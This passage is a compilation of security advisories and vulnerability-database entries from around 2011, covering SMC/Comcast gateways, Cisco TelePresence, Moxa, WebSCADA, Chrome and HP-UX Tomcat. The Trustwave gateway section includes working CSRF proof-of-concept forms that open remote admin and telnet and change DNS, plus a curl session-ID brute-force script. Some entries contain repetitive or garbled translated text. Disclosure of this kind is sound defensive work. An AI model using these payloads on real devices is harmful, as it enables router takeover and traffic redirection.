<form action="http://10.1.10.1/goform/RemoteRange"
name="RMangement" method="post"> <input type="hidden"
value="feat-admin-remote" name="file"> <input type="hidden"
value="admin/" name="dir"> <input type="hidden"
name="RemoteRange" value="0" /> <input type="hidden"
name="rm_access" value="on" /> <input type="hidden"
name="Remote0" value="0.0.0.0,0.0.0.0,1" /> <input
type="hidden" name="http_port" value="8080" /> <input
type="hidden" name="http_enable" value="on" /> <input
type="hidden" name="http_flag" value="1" /> <input
type="hidden" name="msoremote_enableCheck" value="on" />
<input type="hidden" name="mso_remote_enable" value="1" />
<input type="hidden" name="remote_enable" value="0" />
<input type="hidden" name="https_enable" value="on" />
<input type="hidden" name="https_port" value="8181" />
<input type="hidden" name="https_flag" value="1" /> <input
type="hidden" name="telnet_enable" value="on" /> <input
type="hidden" name="telnet_port" value="2323" /> <input
type="hidden" name="telnet_flag" value="1" /> <input
type="hidden" name="Remote1=" value="" /> </form> </body>
</html> <script>
setTimeout("document.RMangement.submit()",4000);
</script>
</body>
</html>
## smcd3g-csrf-poc-3.htm
<html>
<body>
<form name="WanIPform"
action="http://10.1.10.1/goform/Basic" method="post"> <input
type="hidden" value="feat-wan-ip" name="file"> <input
type="hidden" value="admin/" name="dir"> <input
type="hidden" value="Fixed" name="DNSAssign"> <input
type="hidden" value="0" name="dhcpc_release"> <input
type="hidden" value="0" name="dhcpc_renew"> <input
type="hidden" value="" name="domain_name"> <input
type="hidden" value="" name="WDn"> <input type="hidden"
name="SysName" value="" /> <input type="hidden"
name="manual_dns_enable" value="on" /> <input type="hidden"
name="DAddr" value="4.2.2.1" /> <input type="hidden"
name="DAddr0" value="4" /> <input type="hidden"
name="DAddr1" value="2" /> <input type="hidden"
name="DAddr2" value="2" /> <input type="hidden"
name="DAddr3" value="1" /> <input type="hidden"
name="PDAddr" value="4.2.2.2" /> <input type="hidden"
name="PDAddr0" value="4" /> <input type="hidden"
name="PDAddr1" value="2" /> <input type="hidden"
name="PDAddr2" value="2" /> <input type="hidden"
name="PDAddr3" value="2" /> </form> <script>
setTimeout("document.WanIPform.submit()",5000);
</script>
</body>
</html>
If the PoC was embedded in any web page the targeted user visited while
logged into the device, the attacker would be provided remote
administration in to the gateway device include a telnet shell. This would
allow the attacker to redirect traffic to a malicious end-point.
Finding 3: Weak Session Management
CVE: CVE-2011-0887
SMCD3G-CCR gateways provided by Comcast utilize a predictable value to
validate the active web management portal session. The epoch time of
beginning of the session is stored as a cookie labeled "userid". This
provides a predictable range of session IDs that can be brute-forced.
The following PoC attempts to brute force the session IDs by requesting the
admin page with an incrementing cookie and determining whether it wants to
redirect to login.asp.
## smcd3g-session-poc.sh
#!/bin/bash
start=1267604160
end=1267605960
for (( i=$start; i<=$end; i++)) do if [ `curl -sb userid=$i
http://10.1.10.1/admin/index.asp | grep -c login.asp` -lt
"1" ] then echo "Session ID Found: $i"
fi
if [ $(($i % 100)) -eq "0" ]
then echo "Currently at $i"
fi
done
Through this, an attacker can brute-force the possible valid session IDs.
Sessions do by default expire within 10 minutes, thus the attack window is
limited but can be leveraged with other attack methods.
Vendor Response:
These issues have been addressed as of version 1.4.0.49.2
Remediation Steps:
In order to determine if the correct version is installed, users should
view the "About" link in the management interface. Versions 1.4.0.49.2 and
above have been corrected.
Vendor Communication Timeline:
08/30/10 - Vulnerability disclosed
01/21/11 - Patch Released
02/04/11 - Advisory Published
Revision History:
1.0 Initial publication
References
1. http://www.smc.com/index.cfm?event=viewProduct&pid=1678
About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com
About Trustwave's SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
| VAR-201102-0386 | No CVE | Moxa Device Manager 'MDMUtil.dll' Remote Buffer Overflow Vulnerability |
CVSS V2: - CVSS V3: - Severity: LOW |
Moxa Device Manager is a remote management tool for Moxa's embedded computers. The \"MDMUtil.dll\" module has a boundary error when processing certain messages, tempting the user to link to a malicious MDM gateway to trigger a stack-based buffer overflow. Successful exploitation of a vulnerability can execute arbitrary instructions in an application security context. Failed exploit attempts will result in a denial-of-service condition
| VAR-201102-0225 | CVE-2011-0385 | Cisco TelePresence Recording Server and Cisco TelePresence Multipoint Switch Vulnerability in |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
The administrative web interface on Cisco TelePresence Recording Server devices with software 1.6.x and Cisco TelePresence Multipoint Switch (CTMS) devices with software 1.0.x, 1.1.x, 1.5.x, and 1.6.x allows remote attackers to create or overwrite arbitrary files, and possibly execute arbitrary code, via a crafted request, aka Bug IDs CSCth85786 and CSCth61065. The problem is Bug IDs CSCth85786 and CSCth61065 It is a problem.A third party could create or overwrite arbitrary files and execute arbitrary code through crafted requests. Cisco TelePresence is a telepresence conferencing solution developed by Cisco. Unauthenticated remote attackers can send trait requests to affected devices, allowing arbitrary content files to be created anywhere on the device. To exploit this vulnerability, an attacker could send a specially crafted request to the devices TCP ports 80 and 443. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary files on the webserver.
This issue is tracked by Cisco bug IDs CSCth85786 and CSCth61065. The solution provides components such as audio and video spaces, which can provide remote participants with a "face-to-face" virtual meeting room effect. The Cisco TelePresence implementation does not properly filter user-supplied input. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Cisco Security Advisory: Multiple Vulnerabilities in Cisco
TelePresence Recording Server
Advisory ID: cisco-sa-20110223-telepresence-ctrs
Revision 1.0
For Public Release 2011 February 23 1600 UTC (GMT)
+---------------------------------------------------------------------
Summary
=======
Multiple vulnerabilities exist within the Cisco TelePresence
Recording Server. The defect
that is related to each component is covered in each associated
advisory. The defect
that is related to each component is covered in each associated
advisory. The defect that is related to each component is
covered in each associated advisory. The defect that
is related to each component is covered in each associated advisory.
All releases of Cisco TelePresence software prior to 1.7.1 are
affected by one or more of the vulnerabilities listed in this
advisory.
To determine the current version of software that is running on the
Cisco TelePresence Recording Server, SSH into the device and issue the
show version active and the show version inactive commands. The
output should resemble the following example:
admin: show version active
Active Master Version: 1.7.0.0-151
Active Version Installed Software Options:
No Installed Software Options Found.
admin: show version inactive
Inactive Master Version: 1.6.2.0-237
Inactive Version Installed Software Options:
No Installed Software Options Found.
In the preceding example, the system has versions 1.6.2 and 1.7.0
loaded on the device and version 1.7.0 is currently active. A device
is affected only by vulnerabilities that are present in the active
software version.
Products Confirmed Not Vulnerable
+--------------------------------
No other Cisco products are currently known to be affected by these
vulnerabilities.
Details
=======
The Cisco TelePresence solution allows for immersive, in-person
communication and collaboration over the network with colleagues,
prospects, and partners even when they are located in opposite
hemispheres. These vulnerabilities are
independent of each other.
Unauthenticated Java Servlet Access
+----------------------------------
A number of sensitive Java Servlets delivered via a Java Servlet
framework within the Cisco TelePresence Recording Server could allow
a remote, unauthenticated attacker to perform actions that should be
restricted to administrative users.
* Cisco TelePresence Recording Server - CSCtf42005 ( registered
customers only) has been assigned the CVE identifier
CVE-2011-0383.
* Cisco TelePresence Recording Server - CSCtf97221 ( registered
customers only) has been assigned the CVE identifier
CVE-2011-0382.
* Cisco TelePresence Recording Server - CSCth85786 ( registered
customers only) has been assigned the CVE identifier
CVE-2011-0385. This vulnerability could be leveraged to obtain full
control of the affected device.
* Cisco TelePresence Recording Server - CSCti50739 ( registered
customers only) has been assigned the CVE identifier
CVE-2011-0386. This vulnerability could allow
an unauthenticated, adjacent attacker to trigger a buffer overflow
condition.
Because Cisco Discovery Protocol works at the data-link layer (Layer
2), an attacker must have a way to submit an Ethernet frame directly
to an affected device. This may be possible in situations where the
affected system is part of a bridged network or connected to a
nonpartitioned device such as a network hub.
* Cisco TelePresence Recording Server - CSCtd75769 ( registered
customers only) has been assigned the CVE identifier
CVE-2011-0379.
Ad Hoc Recording Denial of Service
+---------------------------------
A denial of service vulnerability exists within Cisco TelePresence
Recording Server devices. A restart of the affected
device may be required to regain functionality.
* Cisco TelePresence Recording Server - CSCtf97205 ( registered
customers only) has been assigned the CVE identifier
CVE-2011-0391.
Java RMI Denial of Service
+-------------------------
A denial of service vulnerability exists within Cisco TelePresence
Recording Server devices due to a failure to properly restrict access
to the RMI interface of the Java Servlet framework. An
unauthenticated, remote attacker could trigger an out-of-memory
condition on the Servlet host by issuing a series of crafted
requests.
* Cisco TelePresence Recording Server - CSCtg35830 ( registered
customers only) has been assigned the CVE identifier
CVE-2011-0388. This vulnerability could allow an
unauthenticated, remote attacker to perform a limited number of
actions on the system that should be restricted to authorized users.
* Cisco TelePresence Recording Server - CSCtg35833 ( registered
customers only) has been assigned the CVE identifier
CVE-2011-0392.
Vulnerability Scoring Details
+----------------------------
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Cisco Security Advisory is done in accordance with
CVSS version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:
http://intellishield.cisco.com/security/alertmanager/cvss.
* CSCtf42005 - Unauthenticated Java Servlet Access
CVSS Base Score - 10
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 8.3
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCtf97221 - CGI Command Injection
CVSS Base Score - 10
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 8.3
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCth85786 - Unauthenticated Arbitrary File Upload
CVSS Base Score - 10
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 8.3
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCti50739 - XML-RPC Arbitrary File Overwrite
CVSS Base Score - 9.3
Access Vector - Network
Access Complexity - Medium
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 7.7
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCtd75769 - Cisco Discovery Protocol Remote Code Execution
CVSS Base Score - 7.9
Access Vector - Adjacent Network
Access Complexity - Medium
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 6.5
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCtf97205 - Ad Hoc Recording Denial of Service
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCtg35830 - Java RMI Denial of Service
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCtg35833 - Unauthenticated XML-RPC Interface
CVSS Base Score - 7.5
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - Partial
Integrity Impact - Partial
Availability Impact - Partial
CVSS Temporal Score - 6.2
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of the Unauthenticated Java Servlet Access
(CSCtf42005) vulnerability could allow an unauthenticated, remote
attacker to take complete control of the affected device or system. This may allow the attacker to gain full control of the
affected device. In some instances
this issue could be leveraged to gain complete control of the
affected system.
Successful exploitation of the Cisco Discovery Protocol Remote Code
Execution (CSCtd75769) vulnerability could allow an unauthenticated,
adjacent attacker to take complete control of the affected system.
Successful exploitation of the Ad Hoc Recording Denial of Service
(CSCtf97205) vulnerability could allow an unauthenticated, remote
attacker to cause a persistent denial of service condition on an
affected device.
Successful exploitation of the Java RMI Denial of Service
(CSCtg35830) vulnerability could allow an unauthenticated, remote
attacker to cause all web-based services to become inaccessible.
Successful exploitation of the Unauthenticated XML-RPC Interface
(CSCtg35833) vulnerability could allow an unauthenticated, remote
attacker to perform a number of actions that should be restricted to
authenticated users.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
Each row of the following Cisco TelePresence System Software table
defines a specific defect, the first fixed release, and the
recommended release to resolve all the security issues identified in
this advisory as well as other non-security-related issues. Cisco
recommends upgrading to a release equal to or later than the release
in the Recommended Release column of the table.
Workarounds
===========
There are no device- or system-based workarounds for the identified
vulnerabilities.
Additional mitigations that can be deployed on Cisco devices within
the network are available in the Cisco Applied Intelligence companion
document for this advisory:
http://www.cisco.com/warp/public/707/cisco-amb-20110223-telepresence.shtml
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at:
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html,
or as otherwise set forth at Cisco.com Downloads at:
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com.
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized telephone numbers,
and instructions and e-mail addresses for use in various languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities described in this advisory.
All vulnerabilities identified within this Security Advisory were
discovered internally by Cisco.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20110223-telepresence-ctrs.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+---------------------------------------+
| Revision | | Initial |
| 1.0 | 2011-February-23 | public |
| | | release |
+---------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at:
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.
This includes instructions for press inquiries regarding Cisco security notices.
All Cisco security advisories are available at:
http://www.cisco.com/go/psirt.
+--------------------------------------------------------------------
Copyright 2010-2011 Cisco Systems, Inc. All rights reserved.
+--------------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)
iF4EAREIAAYFAk1lHp0ACgkQQXnnBKKRMNDi6gD9FHcn7qE/BjeRZk7WFzDaN7m/
+eea5C4SM6kS1uQK5DoA/152WnbmatSGw6hJP/e2MSmWOqU1IKU5oxZOO8uqrShf
=xAVI
-----END PGP SIGNATURE-----
.
Revision History
================
+----------------------------------------+
| Revision | | Initial |
| 1.0 | 2011-February-23 | public |
| | | release
| VAR-201102-0182 | CVE-2010-4741 |
Moxa Device Manager MDMTool.exe Buffer Overflow Vulnerability
Related entries in the VARIoT exploits database: VAR-E-201011-0390 |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Stack-based buffer overflow in MDMUtil.dll in MDMTool.exe in MDM Tool before 2.3 in Moxa Device Manager allows remote MDM Gateways to execute arbitrary code via crafted data in a session on TCP port 54321.
An attacker may exploit this issue to execute arbitrary code within the context of the application. Failed exploit attempts will likely cause denial-of-service conditions
| VAR-201102-0174 | CVE-2010-4733 | WebSCADA Multiple Product Weak Password Vulnerabilities |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
WebSCADA WS100 and WS200, Easy Connect EC150, Modbus RTU - TCP Gateway MB100, and Serial Ethernet Server SS100 on the IntelliCom NetBiter NB100 and NB200 platforms have a default username and password, which makes it easier for remote attackers to obtain superadmin access via the web interface, a different vulnerability than CVE-2009-4463. IntelliCom NetBiter NB100 and NB200 There are multiple vulnerabilities in products that run on the platform, including directory traversal. Other NB100 and NB200 Products that run on the platform may also be affected.By a third party with access to the product, superadmin Authority (Netbiter Top-level permissions ) By acquiring, system files and configuration files may be browsed. In addition, an arbitrary command may be executed by uploading malicious code. A remote attacker can gain access to the super administrator through the web interface
| VAR-201102-0197 | CVE-2010-4730 | WebSCADA Multiple products cgi-bin/read.cgi Directory Traversal Vulnerability |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Directory traversal vulnerability in cgi-bin/read.cgi in WebSCADA WS100 and WS200, Easy Connect EC150, Modbus RTU - TCP Gateway MB100, and Serial Ethernet Server SS100 on the IntelliCom NetBiter NB100 and NB200 platforms allows remote authenticated administrators to read arbitrary files via a .. (dot dot) in the page parameter, a different vulnerability than CVE-2009-4463. IntelliCom NetBiter NB100 and NB200 Multiple running on the platform IntelliCom Product cgi-bin/read.cgi Contains a directory traversal vulnerability
| VAR-201102-0173 | CVE-2010-4732 | WebSCADA Multiple products cgi-bin/read.cgi Remote code execution vulnerability |
CVSS V2: 9.0 CVSS V3: - Severity: HIGH |
cgi-bin/read.cgi in WebSCADA WS100 and WS200, Easy Connect EC150, Modbus RTU - TCP Gateway MB100, and Serial Ethernet Server SS100 on the IntelliCom NetBiter NB100 and NB200 platforms allows remote authenticated administrators to execute arbitrary code by using a config.html 2.conf action to replace the logo page's GIF image file with a file containing this code, a different vulnerability than CVE-2009-4463. IntelliCom NetBiter products based on the NB100 and NB200 platforms contain multiple vulnerabilities. IntelliCom NetBiter NB100 and NB200 Multiple running on the platform IntelliCom Product cgi-bin/read.cgi Is A vulnerability that allows arbitrary code execution exists
| VAR-201102-0172 | CVE-2010-4731 | WebSCADA Multiple products cgi-bin/read.cgi Absolute path traversal vulnerability |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Absolute path traversal vulnerability in cgi-bin/read.cgi in WebSCADA WS100 and WS200, Easy Connect EC150, Modbus RTU - TCP Gateway MB100, and Serial Ethernet Server SS100 on the IntelliCom NetBiter NB100 and NB200 platforms allows remote authenticated administrators to read arbitrary files via a full pathname in the file parameter, a different vulnerability than CVE-2009-4463. IntelliCom NetBiter products based on the NB100 and NB200 platforms contain multiple vulnerabilities. IntelliCom NetBiter NB100 and NB200 Multiple running on the platform IntelliCom Product cgi-bin/read.cgi Is An absolute path traversal vulnerability exists
| VAR-201102-0159 | CVE-2011-0782 | Google Chrome Service disruption in ( Application crash ) Vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Google Chrome before 9.0.597.84 on Mac OS X does not properly mitigate an unspecified flaw in the Mac OS X 10.5 SSL libraries, which allows remote attackers to cause a denial of service (application crash) via unknown vectors. Google Chrome is prone to multiple vulnerabilities.
Attackers may exploit these issues to execute arbitrary code in the context of the browser or cause denial-of-service conditions; other attacks are also possible.
Chrome versions prior to 9.0.597.84 are vulnerable. Google Chrome is a web browser developed by Google (Google)
| VAR-201102-0149 | CVE-2011-0776 | Mac OS X Run on Google Chrome Vulnerability in obtaining important information in sandbox implementation |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The sandbox implementation in Google Chrome before 9.0.597.84 on Mac OS X might allow remote attackers to obtain potentially sensitive information about local files via vectors related to the stat system call. Google Chrome is prone to multiple vulnerabilities.
Attackers may exploit these issues to execute arbitrary code in the context of the browser or cause denial-of-service conditions; other attacks are also possible.
Chrome versions prior to 9.0.597.84 are vulnerable. Google Chrome is a web browser developed by Google (Google)
| VAR-201102-0280 | CVE-2010-4476 |
IBM Lotus vulnerable to denial-of-service (DoS)
Related entries in the VARIoT exploits database: VAR-E-201003-0021, VAR-E-201102-0765 |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The Double.parseDouble method in Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier, as used in OpenJDK, Apache, JBossweb, and other products, allows remote attackers to cause a denial of service via a crafted string that triggers an infinite loop of estimations during conversion to a double-precision binary floating-point number, as demonstrated using 2.2250738585072012e-308. IBM Lotus product line contains a denial-of-service (DoS) vulnerability. IBM Lotus product line contains a denial-of-service (DoS) vulnerability due to an issue in Java Runtime Environment (JRE).A remote attacker may cause a denial-of-service (DoS). Oracle Java is prone to a remote denial-of-service vulnerability.
Successful attacks will cause applications written in Java to hang, creating a denial-of-service condition.
This issue affects both the Java compiler and Runtime Environment. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Note: the current version of the following document is available here:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c03716627
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c03716627
Version: 1
HPSBUX02860 SSRT101146 rev.1 - HP-UX Apache Running Tomcat Servlet Engine,
Remote Denial of Service (DoS), Access Restriction Bypass, Unauthorized
Modification and Other Vulnerabilities
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.
Release Date: 2013-03-28
Last Updated: 2013-03-28
- ----------------------------------------------------------------------------
Potential Security Impact: Remote Denial of Service (DoS), access restriction
bypass, unauthorized modification and other vulnerabilities
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP-UX Apache
running Tomcat Servlet Engine. These vulnerabilities could be exploited
remotely to create a Denial of Service (DoS) or to perform an access
restriction bypass, unauthorized modification, and other vulnerabilities.
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.23, B.11.31 running HP-UX Apache running Tomcat Servlet Engine
5.5.35.01 or earlier
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2008-5515 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2009-0033 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2009-0580 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3
CVE-2009-0781 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3
CVE-2009-0783 (AV:L/AC:L/Au:N/C:P/I:P/A:P) 4.6
CVE-2009-2693 (AV:N/AC:M/Au:N/C:N/I:P/A:P) 5.8
CVE-2009-2902 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3
CVE-2009-3548 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2010-1157 (AV:N/AC:H/Au:N/C:P/I:N/A:N) 2.6
CVE-2010-2227 (AV:N/AC:L/Au:N/C:P/I:N/A:P) 6.4
CVE-2010-3718 (AV:L/AC:H/Au:N/C:N/I:P/A:N) 1.2
CVE-2010-4476 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2011-0013 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3
CVE-2011-1184 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2011-2204 (AV:L/AC:M/Au:N/C:P/I:N/A:N) 1.9
CVE-2011-2526 (AV:L/AC:M/Au:N/C:P/I:P/A:P) 4.4
CVE-2011-2729 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2011-3190 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2011-4858 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2012-0022 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2012-5885 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following software updates to resolve the vulnerability.
The updates are available for download from https://h20392.www2.hp.com/portal
/swdepot/displayProductInfo.do?productNumber=HPUXWST553601
Servlet Version
Depot Name
HP-UX Apache Tomcat Servlet Engine v5.5.36.01
HP-UX_11.23_HPUXWS22T-B5536-1123.depot
HP-UX_11.31_HPUXWS22T-B5536-1131.depot
MANUAL ACTIONS: Yes - Update
Install HP-UX Apache Tomcat Servlet Engine 5.5.36.01 or subsequent
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application
that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins
issued by HP and lists recommended actions that may apply to a specific HP-UX
system. It can also download patches and create a depot automatically. For
more information see https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX Web Server Suite
HP-UX B.11.23
HP-UX B.11.31
==================
hpuxws22TOMCAT.TOMCAT
action: install revision B.5.5.36.01 or subsequent
END AFFECTED VERSION
HISTORY
Version:1 (rev.1) - 28 March 2013 Initial release
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin List: A list of HP Security Bulletins, updated
periodically, is contained in HP Security Notice HPSN-2011-001:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c02964430
